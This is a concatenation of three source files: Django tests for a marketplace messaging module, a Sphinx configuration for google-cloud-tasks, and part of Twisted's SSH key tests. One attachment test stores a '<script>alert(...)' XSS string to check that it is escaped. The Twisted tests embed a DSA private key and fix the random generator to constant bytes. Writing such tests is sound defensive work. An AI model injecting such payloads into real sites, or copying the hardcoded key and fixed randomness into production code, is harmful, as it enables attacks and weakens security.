"""
Test `is_valid()` when the token has expired.
"""
self.token.modified = self.days_ago(const.THREAD_TOKEN_EXPIRY + 1)
assert not self.token.is_valid()
def test_unused_token_is_valid(self):
"""
Test `is_valid()` when the token is unused.
"""
assert self.token.is_valid()
def test_max_used_thread_token_is_valid(self):
"""
Test `is_valid()` when the token has been fully used.
"""
self.token.use_count = const.MAX_TOKEN_USE_COUNT
assert not self.token.is_valid()
def test_reset_uuid(self):
"""
Test `reset_uuid()` generates a differ uuid.
"""
self.thread.save()
self.token.thread = self.thread
self.token.save()
uuid = self.token.uuid
assert uuid
self.token.reset_uuid()
assert self.token.uuid
assert uuid != self.token.uuid
class TestCommAttachment(TestCase, CommTestMixin):
fixtures = fixture('webapp_337141')
XSS_STRING = 'MMM <script>alert(bacon);</script>'
def setUp(self):
self.user = user_factory(email='porkbelly')
mkt.set_user(self.user)
self.profile = self.user
self.addon = Webapp.objects.get()
self.version = self.addon.latest_version
self.thread = self._thread_factory()
self.note = self._note_factory(self.thread)
self.attachment1, self.attachment2 = self._attachments(self.note)
def _attachments(self, note):
"""
Create and return a tuple of CommAttachment instances.
"""
ala1 = CommAttachment.objects.create(note=note,
filepath='bacon.txt',
mimetype='text/plain')
ala2 = CommAttachment.objects.create(note=note,
filepath='bacon.jpg',
description=self.XSS_STRING,
mimetype='image/jpeg')
return ala1, ala2
def test_filename(self):
msg = 'CommAttachment().filename() returning incorrect filename.'
eq_(self.attachment1.filename(), 'bacon.txt', msg)
eq_(self.attachment2.filename(), 'bacon.jpg', msg)
def test_full_path_dirname(self):
msg = 'CommAttachment().full_path() returning incorrect path.'
FAKE_PATH = '/tmp/attachments/'
with self.settings(REVIEWER_ATTACHMENTS_PATH=FAKE_PATH):
eq_(self.attachment1.full_path(), FAKE_PATH + 'bacon.txt', msg)
eq_(self.attachment2.full_path(), FAKE_PATH + 'bacon.jpg', msg)
def test_display_name(self):
msg = ('CommAttachment().display_name() returning '
'incorrect display name.')
eq_(self.attachment1.display_name(), 'bacon.txt', msg)
def test_display_name_xss(self):
ok_('<script>' not in self.attachment2.display_name())
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
def test_is_image(self):
msg = 'CommAttachment().is_image() not correctly detecting images.'
eq_(self.attachment1.is_image(), False, msg)
eq_(self.attachment2.is_image(), True, msg)
def test_get_absolute_url(self):
try:
self.attachment1.get_absolute_url()
self.attachment2.get_absolute_url()
except NoReverseMatch:
assert False, 'CommAttachment.get_absolute_url NoReverseMatch'
class TestUserHasPermNoteExtensions(TestCase):
def setUp(self):
super(TestUserHasPermNoteExtensions, self).setUp()
self.extension = extension_factory()
self.developer = user_factory()
self.developer.extension_set.add(self.extension)
self.reviewer = user_factory()
self.grant_permission(self.reviewer, 'ContentTools: AddonReview')
self.thread = CommunicationThread.objects.create(
_extension=self.extension,
_extension_version=self.extension.latest_version)
@mock.patch('mkt.comm.models.acl.check_reviewer')
def test_rev_can_see_dev(self, check_reviewer_mock):
check_reviewer_mock.return_value = True
note = self.thread.notes.create(author=self.developer, body='abc',
note_type=const.DEVELOPER_COMMENT)
ok_(user_has_perm_note(note, self.reviewer, request=True))
def test_dev_can_see_rev(self):
note = self.thread.notes.create(
author=self.reviewer, body='abc',
note_type=const.REVIEWER_PUBLIC_COMMENT)
ok_(user_has_perm_note(note, self.developer, request=True))
def test_dev_can_see_dev(self):
note = self.thread.notes.create(
author=self.developer, body='abc',
note_type=const.DEVELOPER_COMMENT)
ok_(user_has_perm_note(note, self.developer, request=True))
def test_dev_can_see_if_perm(self):
note = self.thread.notes.create(
author=self.developer, body='abc',
note_type=const.REVIEWER_COMMENT,
read_permission_developer=True)
ok_(user_has_perm_note(note, self.developer, request=True))
def test_dev_cannot_see_internal_rev(self):
developer2 = user_factory()
developer2.extension_set.add(self.extension)
note = self.thread.notes.create(
author=self.reviewer, body='abc',
note_type=const.REVIEWER_COMMENT)
ok_(not user_has_perm_note(note, self.developer, request=True))
class TestUserHasPermNoteApps(TestCase):
def setUp(self):
super(TestUserHasPermNoteApps, self).setUp()
self.app = app_factory()
self.developer = user_factory()
self.developer.addonuser_set.create(addon=self.app)
self.reviewer = user_factory()
self.grant_permission(self.reviewer, 'Apps', 'Review')
self.thread = CommunicationThread.objects.create(
_addon=self.app, _version=self.app.latest_version)
@mock.patch('mkt.comm.models.acl.check_reviewer')
def test_rev_can_see_dev(self, check_reviewer_mock):
check_reviewer_mock.return_value = True
note = self.thread.notes.create(author=self.developer, body='abc',
note_type=const.DEVELOPER_COMMENT)
ok_(user_has_perm_note(note, self.reviewer, request=True))
def test_dev_can_see_rev(self):
note = self.thread.notes.create(
author=self.reviewer, body='abc',
note_type=const.REVIEWER_PUBLIC_COMMENT)
ok_(user_has_perm_note(note, self.developer, request=True))
def test_dev_can_see_dev(self):
developer2 = user_factory()
developer2.addonuser_set.create(addon=self.app)
note = self.thread.notes.create(
author=self.developer, body='abc',
note_type=const.DEVELOPER_COMMENT)
ok_(user_has_perm_note(note, developer2, request=True))
def test_dev_can_see_if_perm(self):
note = self.thread.notes.create(
author=self.developer, body='abc',
note_type=const.REVIEWER_COMMENT,
read_permission_developer=True)
ok_(user_has_perm_note(note, self.developer, request=True))
def test_dev_cannot_see_internal_rev(self):
note = self.thread.notes.create(
author=self.reviewer, body='abc',
note_type=const.REVIEWER_COMMENT)
ok_(not user_has_perm_note(note, self.developer, request=True))
| bsd-3-clause |
googleapis/googleapis-gen | google/cloud/tasks/v2beta2/tasks-v2beta2-py/docs/conf.py | 3 | 12447 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# google-cloud-tasks documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
__version__ = "0.1.0"
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.6.3"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_flags = ["members"]
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# Allow markdown includes (so releases.md can include CHANGLEOG.md)
# http://www.sphinx-doc.org/en/master/markdown.html
source_parsers = {".md": "recommonmark.parser.CommonMarkParser"}
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = "index"
# General information about the project.
project = u"google-cloud-tasks"
copyright = u"2020, Google, LLC"
author = u"Google APIs" # TODO: autogenerate this bit
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for Python",
"github_user": "googleapis",
"github_repo": "google-cloud-python",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = "google-cloud-tasks-doc"
# -- Options for warnings ------------------------------------------------------
suppress_warnings = [
# Temporarily suppress this to avoid "more than one target found for
# cross-reference" warning, which are intractable for us to avoid while in
# a mono-repo.
# See https://github.com/sphinx-doc/sphinx/blob
# /2a65ffeef5c107c19084fabdd706cdff3f52d93c/sphinx/domains/python.py#L843
"ref.python"
]
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
# Latex figure (float) alignment
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
"google-cloud-tasks.tex",
u"google-cloud-tasks Documentation",
author,
"manual",
)
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
master_doc,
"google-cloud-tasks",
u"Google Cloud Tasks Documentation",
[author],
1,
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"google-cloud-tasks",
u"google-cloud-tasks Documentation",
author,
"google-cloud-tasks",
"GAPIC library for Google Cloud Tasks API",
"APIs",
)
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("http://python.readthedocs.org/en/latest/", None),
"gax": ("https://gax-python.readthedocs.org/en/latest/", None),
"google-auth": ("https://google-auth.readthedocs.io/en/stable", None),
"google-gax": ("https://gax-python.readthedocs.io/en/latest/", None),
"google.api_core": ("https://googleapis.dev/python/google-api-core/latest/", None),
"grpc": ("https://grpc.io/grpc/python/", None),
"requests": ("http://requests.kennethreitz.org/en/stable/", None),
"proto": ("https://proto-plus-python.readthedocs.io/en/stable", None),
"protobuf": ("https://googleapis.dev/python/protobuf/latest/", None),
}
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
| apache-2.0 |
heeraj123/oh-mainline | vendor/packages/twisted/twisted/conch/test/test_keys.py | 17 | 19424 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.conch.ssh.keys}.
"""
try:
import Crypto.Cipher.DES3
except ImportError:
# we'll have to skip these tests without PyCypto and pyasn1
Crypto = None
try:
import pyasn1
except ImportError:
pyasn1 = None
if Crypto and pyasn1:
from twisted.conch.ssh import keys, common, sexpy
import os, base64
from twisted.conch.test import keydata
from twisted.python import randbytes
from twisted.python.hashlib import sha1
from twisted.trial import unittest
class HelpersTestCase(unittest.TestCase):
if Crypto is None:
skip = "cannot run w/o PyCrypto"
if pyasn1 is None:
skip = "cannot run w/o/ PyASN1"
def setUp(self):
self._secureRandom = randbytes.secureRandom
randbytes.secureRandom = lambda x: '\x55' * x
def tearDown(self):
randbytes.secureRandom = self._secureRandom
self._secureRandom = None
def test_pkcs1(self):
"""
Test Public Key Cryptographic Standard #1 functions.
"""
data = 'ABC'
messageSize = 6
self.assertEquals(keys.pkcs1Pad(data, messageSize),
'\x01\xff\x00ABC')
hash = sha1().digest()
messageSize = 40
self.assertEquals(keys.pkcs1Digest('', messageSize),
'\x01\xff\xff\xff\x00' + keys.ID_SHA1 + hash)
def _signRSA(self, data):
key = keys.Key.fromString(keydata.privateRSA_openssh)
sig = key.sign(data)
return key.keyObject, sig
def _signDSA(self, data):
key = keys.Key.fromString(keydata.privateDSA_openssh)
sig = key.sign(data)
return key.keyObject, sig
def test_signRSA(self):
"""
Test that RSA keys return appropriate signatures.
"""
data = 'data'
key, sig = self._signRSA(data)
sigData = keys.pkcs1Digest(data, keys.lenSig(key))
v = key.sign(sigData, '')[0]
self.assertEquals(sig, common.NS('ssh-rsa') + common.MP(v))
return key, sig
def test_signDSA(self):
"""
Test that DSA keys return appropriate signatures.
"""
data = 'data'
key, sig = self._signDSA(data)
sigData = sha1(data).digest()
v = key.sign(sigData, '\x55' * 19)
self.assertEquals(sig, common.NS('ssh-dss') + common.NS(
Crypto.Util.number.long_to_bytes(v[0], 20) +
Crypto.Util.number.long_to_bytes(v[1], 20)))
return key, sig
def test_objectType(self):
"""
Test that objectType, returns the correct type for objects.
"""
self.assertEquals(keys.objectType(keys.Key.fromString(
keydata.privateRSA_openssh).keyObject), 'ssh-rsa')
self.assertEquals(keys.objectType(keys.Key.fromString(
keydata.privateDSA_openssh).keyObject), 'ssh-dss')
self.assertRaises(keys.BadKeyError, keys.objectType, None)
class KeyTestCase(unittest.TestCase):
if Crypto is None:
skip = "cannot run w/o PyCrypto"
if pyasn1 is None:
skip = "cannot run w/o/ PyASN1"
def setUp(self):
self.rsaObj = Crypto.PublicKey.RSA.construct((1L, 2L, 3L, 4L, 5L))
self.dsaObj = Crypto.PublicKey.DSA.construct((1L, 2L, 3L, 4L, 5L))
self.rsaSignature = ('\x00\x00\x00\x07ssh-rsa\x00'
'\x00\x00`N\xac\xb4@qK\xa0(\xc3\xf2h \xd3\xdd\xee6Np\x9d_'
'\xb0>\xe3\x0c(L\x9d{\txUd|!\xf6m\x9c\xd3\x93\x842\x7fU'
'\x05\xf4\xf7\xfaD\xda\xce\x81\x8ea\x7f=Y\xed*\xb7\xba\x81'
'\xf2\xad\xda\xeb(\x97\x03S\x08\x81\xc7\xb1\xb7\xe6\xe3'
'\xcd*\xd4\xbd\xc0wt\xf7y\xcd\xf0\xb7\x7f\xfb\x1e>\xf9r'
'\x8c\xba')
self.dsaSignature = ('\x00\x00\x00\x07ssh-dss\x00\x00'
'\x00(\x18z)H\x8a\x1b\xc6\r\xbbq\xa2\xd7f\x7f$\xa7\xbf'
'\xe8\x87\x8c\x88\xef\xd9k\x1a\x98\xdd{=\xdec\x18\t\xe3'
'\x87\xa9\xc72h\x95')
self.oldSecureRandom = randbytes.secureRandom
randbytes.secureRandom = lambda x: '\xff' * x
self.keyFile = self.mktemp()
file(self.keyFile, 'wb').write(keydata.privateRSA_lsh)
def tearDown(self):
randbytes.secureRandom = self.oldSecureRandom
del self.oldSecureRandom
os.unlink(self.keyFile)
def test__guessStringType(self):
"""
Test that the _guessStringType method guesses string types
correctly.
"""
self.assertEquals(keys.Key._guessStringType(keydata.publicRSA_openssh),
'public_openssh')
self.assertEquals(keys.Key._guessStringType(keydata.publicDSA_openssh),
'public_openssh')
self.assertEquals(keys.Key._guessStringType(
keydata.privateRSA_openssh), 'private_openssh')
self.assertEquals(keys.Key._guessStringType(
keydata.privateDSA_openssh), 'private_openssh')
self.assertEquals(keys.Key._guessStringType(keydata.publicRSA_lsh),
'public_lsh')
self.assertEquals(keys.Key._guessStringType(keydata.publicDSA_lsh),
'public_lsh')
self.assertEquals(keys.Key._guessStringType(keydata.privateRSA_lsh),
'private_lsh')
self.assertEquals(keys.Key._guessStringType(keydata.privateDSA_lsh),
'private_lsh')
self.assertEquals(keys.Key._guessStringType(
keydata.privateRSA_agentv3), 'agentv3')
self.assertEquals(keys.Key._guessStringType(
keydata.privateDSA_agentv3), 'agentv3')
self.assertEquals(keys.Key._guessStringType(
'\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x01'),
'blob')
self.assertEquals(keys.Key._guessStringType(
'\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x01'),
'blob')
self.assertEquals(keys.Key._guessStringType('not a key'),
None)
def _testPublicPrivateFromString(self, public, private, type, data):
self._testPublicFromString(public, type, data)
self._testPrivateFromString(private, type, data)
def _testPublicFromString(self, public, type, data):
publicKey = keys.Key.fromString(public)
self.assertTrue(publicKey.isPublic())
self.assertEquals(publicKey.type(), type)
for k, v in publicKey.data().items():
self.assertEquals(data[k], v)
def _testPrivateFromString(self, private, type, data):
privateKey = keys.Key.fromString(private)
self.assertFalse(privateKey.isPublic())
self.assertEquals(privateKey.type(), type)
for k, v in data.items():
self.assertEquals(privateKey.data()[k], v)
def test_fromOpenSSH(self):
"""
Test that keys are correctly generated from OpenSSH strings.
"""
self._testPublicPrivateFromString(keydata.publicRSA_openssh,
keydata.privateRSA_openssh, 'RSA', keydata.RSAData)
self.assertEquals(keys.Key.fromString(
keydata.privateRSA_openssh_encrypted,
passphrase='encrypted'),
keys.Key.fromString(keydata.privateRSA_openssh))
self.assertEquals(keys.Key.fromString(
keydata.privateRSA_openssh_alternate),
keys.Key.fromString(keydata.privateRSA_openssh))
self._testPublicPrivateFromString(keydata.publicDSA_openssh,
keydata.privateDSA_openssh, 'DSA', keydata.DSAData)
def test_fromOpenSSH_with_whitespace(self):
"""
If key strings have trailing whitespace, it should be ignored.
"""
# from bug #3391, since our test key data doesn't have
# an issue with appended newlines
privateDSAData = """-----BEGIN DSA PRIVATE KEY-----
MIIBuwIBAAKBgQDylESNuc61jq2yatCzZbenlr9llG+p9LhIpOLUbXhhHcwC6hrh
EZIdCKqTO0USLrGoP5uS9UHAUoeN62Z0KXXWTwOWGEQn/syyPzNJtnBorHpNUT9D
Qzwl1yUa53NNgEctpo4NoEFOx8PuU6iFLyvgHCjNn2MsuGuzkZm7sI9ZpQIVAJiR
9dPc08KLdpJyRxz8T74b4FQRAoGAGBc4Z5Y6R/HZi7AYM/iNOM8su6hrk8ypkBwR
a3Dbhzk97fuV3SF1SDrcQu4zF7c4CtH609N5nfZs2SUjLLGPWln83Ysb8qhh55Em
AcHXuROrHS/sDsnqu8FQp86MaudrqMExCOYyVPE7jaBWW+/JWFbKCxmgOCSdViUJ
esJpBFsCgYEA7+jtVvSt9yrwsS/YU1QGP5wRAiDYB+T5cK4HytzAqJKRdC5qS4zf
C7R0eKcDHHLMYO39aPnCwXjscisnInEhYGNblTDyPyiyNxAOXuC8x7luTmwzMbNJ
/ow0IqSj0VF72VJN9uSoPpFd4lLT0zN8v42RWja0M8ohWNf+YNJluPgCFE0PT4Vm
SUrCyZXsNh6VXwjs3gKQ
-----END DSA PRIVATE KEY-----"""
self.assertEquals(keys.Key.fromString(privateDSAData),
keys.Key.fromString(privateDSAData + '\n'))
def test_fromLSH(self):
"""
Test that keys are correctly generated from LSH strings.
"""
self._testPublicPrivateFromString(keydata.publicRSA_lsh,
keydata.privateRSA_lsh, 'RSA', keydata.RSAData)
self._testPublicPrivateFromString(keydata.publicDSA_lsh,
keydata.privateDSA_lsh, 'DSA', keydata.DSAData)
sexp = sexpy.pack([['public-key', ['bad-key', ['p', '2']]]])
self.assertRaises(keys.BadKeyError, keys.Key.fromString,
data='{'+base64.encodestring(sexp)+'}')
sexp = sexpy.pack([['private-key', ['bad-key', ['p', '2']]]])
self.assertRaises(keys.BadKeyError, keys.Key.fromString,
sexp)
def test_fromAgentv3(self):
"""
Test that keys are correctly generated from Agent v3 strings.
"""
self._testPrivateFromString(keydata.privateRSA_agentv3, 'RSA',
keydata.RSAData)
self._testPrivateFromString(keydata.privateDSA_agentv3, 'DSA',
keydata.DSAData)
self.assertRaises(keys.BadKeyError, keys.Key.fromString,
'\x00\x00\x00\x07ssh-foo'+'\x00\x00\x00\x01\x01'*5)
def test_fromStringErrors(self):
"""
keys.Key.fromString should raise BadKeyError when the key is invalid.
"""
self.assertRaises(keys.BadKeyError, keys.Key.fromString, '')
# no key data with a bad key type
self.assertRaises(keys.BadKeyError, keys.Key.fromString, '',
'bad_type')
# trying to decrypt a key which doesn't support encryption
self.assertRaises(keys.BadKeyError, keys.Key.fromString,
keydata.publicRSA_lsh, passphrase = 'unencrypted')
# trying to decrypt an unencrypted key
self.assertRaises(keys.EncryptedKeyError, keys.Key.fromString,
keys.Key(self.rsaObj).toString('openssh', 'encrypted'))
# key with no key data
self.assertRaises(keys.BadKeyError, keys.Key.fromString,
'-----BEGIN RSA KEY-----\nwA==\n')
def test_fromFile(self):
"""
Test that fromFile works correctly.
"""
self.assertEquals(keys.Key.fromFile(self.keyFile),
keys.Key.fromString(keydata.privateRSA_lsh))
self.assertRaises(keys.BadKeyError, keys.Key.fromFile,
self.keyFile, 'bad_type')
self.assertRaises(keys.BadKeyError, keys.Key.fromFile,
self.keyFile, passphrase='unencrypted')
def test_init(self):
"""
Test that the PublicKey object is initialized correctly.
"""
obj = Crypto.PublicKey.RSA.construct((1L, 2L))
key = keys.Key(obj)
self.assertEquals(key.keyObject, obj)
def test_equal(self):
"""
Test that Key objects are compared correctly.
"""
rsa1 = keys.Key(self.rsaObj)
rsa2 = keys.Key(self.rsaObj)
rsa3 = keys.Key(Crypto.PublicKey.RSA.construct((1L, 2L)))
dsa = keys.Key(self.dsaObj)
self.assertTrue(rsa1 == rsa2)
self.assertFalse(rsa1 == rsa3)
self.assertFalse(rsa1 == dsa)
self.assertFalse(rsa1 == object)
self.assertFalse(rsa1 == None)
def test_notEqual(self):
"""
Test that Key objects are not-compared correctly.
"""
rsa1 = keys.Key(self.rsaObj)
rsa2 = keys.Key(self.rsaObj)
rsa3 = keys.Key(Crypto.PublicKey.RSA.construct((1L, 2L)))
dsa = keys.Key(self.dsaObj)
self.assertFalse(rsa1 != rsa2)
self.assertTrue(rsa1 != rsa3)
self.assertTrue(rsa1 != dsa)
self.assertTrue(rsa1 != object)
self.assertTrue(rsa1 != None)
def test_type(self):
"""
Test that the type method returns the correct type for an object.
"""
self.assertEquals(keys.Key(self.rsaObj).type(), 'RSA')
self.assertEquals(keys.Key(self.rsaObj).sshType(), 'ssh-rsa')
self.assertEquals(keys.Key(self.dsaObj).type(), 'DSA')
self.assertEquals(keys.Key(self.dsaObj).sshType(), 'ssh-dss')
self.assertRaises(RuntimeError, keys.Key(None).type)
self.assertRaises(RuntimeError, keys.Key(None).sshType)
self.assertRaises(RuntimeError, keys.Key(self).type)
self.assertRaises(RuntimeError, keys.Key(self).sshType)
def test_fromBlob(self):
"""
Test that a public key is correctly generated from a public key blob.
"""
rsaBlob = common.NS('ssh-rsa') + common.MP(2) + common.MP(3)
rsaKey = keys.Key.fromString(rsaBlob)
dsaBlob = (common.NS('ssh-dss') + common.MP(2) + common.MP(3) +
common.MP(4) + common.MP(5))
dsaKey = keys.Key.fromString(dsaBlob)
badBlob = common.NS('ssh-bad')
self.assertTrue(rsaKey.isPublic())
self.assertEquals(rsaKey.data(), {'e':2L, 'n':3L})
self.assertTrue(dsaKey.isPublic())
self.assertEquals(dsaKey.data(), {'p':2L, 'q':3L, 'g':4L, 'y':5L})
self.assertRaises(keys.BadKeyError,
keys.Key.fromString, badBlob)
def test_fromPrivateBlob(self):
"""
Test that a private key is correctly generated from a private key blob.
"""
rsaBlob = (common.NS('ssh-rsa') + common.MP(2) + common.MP(3) +
common.MP(4) + common.MP(5) + common.MP(6) + common.MP(7))
rsaKey = keys.Key._fromString_PRIVATE_BLOB(rsaBlob)
dsaBlob = (common.NS('ssh-dss') + common.MP(2) + common.MP(3) +
common.MP(4) + common.MP(5) + common.MP(6))
dsaKey = keys.Key._fromString_PRIVATE_BLOB(dsaBlob)
badBlob = common.NS('ssh-bad')
self.assertFalse(rsaKey.isPublic())
self.assertEqual(
rsaKey.data(), {'n':2L, 'e':3L, 'd':4L, 'u':5L, 'p':6L, 'q':7L})
self.assertFalse(dsaKey.isPublic())
self.assertEqual(dsaKey.data(), {'p':2L, 'q':3L, 'g':4L, 'y':5L, 'x':6L})
self.assertRaises(
keys.BadKeyError, keys.Key._fromString_PRIVATE_BLOB, badBlob)
def test_blob(self):
"""
Test that the Key object generates blobs correctly.
"""
self.assertEquals(keys.Key(self.rsaObj).blob(),
'\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x02'
'\x00\x00\x00\x01\x01')
self.assertEquals(keys.Key(self.dsaObj).blob(),
'\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x03'
'\x00\x00\x00\x01\x04\x00\x00\x00\x01\x02'
'\x00\x00\x00\x01\x01')
badKey = keys.Key(None)
self.assertRaises(RuntimeError, badKey.blob)
def test_privateBlob(self):
"""
L{Key.privateBlob} returns the SSH protocol-level format of the private
key and raises L{RuntimeError} if the underlying key object is invalid.
"""
self.assertEquals(keys.Key(self.rsaObj).privateBlob(),
'\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x01'
'\x00\x00\x00\x01\x02\x00\x00\x00\x01\x03\x00'
'\x00\x00\x01\x04\x00\x00\x00\x01\x04\x00\x00'
'\x00\x01\x05')
self.assertEquals(keys.Key(self.dsaObj).privateBlob(),
'\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x03'
'\x00\x00\x00\x01\x04\x00\x00\x00\x01\x02\x00'
'\x00\x00\x01\x01\x00\x00\x00\x01\x05')
badKey = keys.Key(None)
self.assertRaises(RuntimeError, badKey.privateBlob)
def test_toOpenSSH(self):
"""
Test that the Key object generates OpenSSH keys correctly.
"""
key = keys.Key.fromString(keydata.privateRSA_lsh)
self.assertEquals(key.toString('openssh'), keydata.privateRSA_openssh)
self.assertEquals(key.toString('openssh', 'encrypted'),
keydata.privateRSA_openssh_encrypted)
self.assertEquals(key.public().toString('openssh'),
keydata.publicRSA_openssh[:-8]) # no comment
self.assertEquals(key.public().toString('openssh', 'comment'),
keydata.publicRSA_openssh)
key = keys.Key.fromString(keydata.privateDSA_lsh)
self.assertEquals(key.toString('openssh'), keydata.privateDSA_openssh)
